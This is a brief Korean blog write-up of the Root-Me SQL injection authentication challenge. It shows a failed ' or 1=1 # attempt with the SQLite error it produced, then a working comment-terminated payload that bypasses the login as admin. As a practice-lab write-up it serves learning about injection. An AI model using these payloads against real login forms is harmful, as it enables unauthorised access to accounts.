ROOTME] SQL injection - Authentication

노션으로 옮김·2020년 3월 8일
0

wargame

목록 보기
14/59
post-thumbnail

문제

username과 password를 입력받는 폼이 주어진다.


풀이

기본 구문인 'or 1=1 # '을 삽입해본다.

Warning: SQLite3::query(): Unable to prepare statement: 1, unrecognized token: "#" in /challenge/web-serveur/ch9/index.php on line 38
unrecognized token: "#"

sqlite가 사용되었고, sqlite에서 주석은 --이다.

1' or username='admin' --

의 페이로드로 admin의 패스워드를 획득할 수 있었다.

0개의 댓글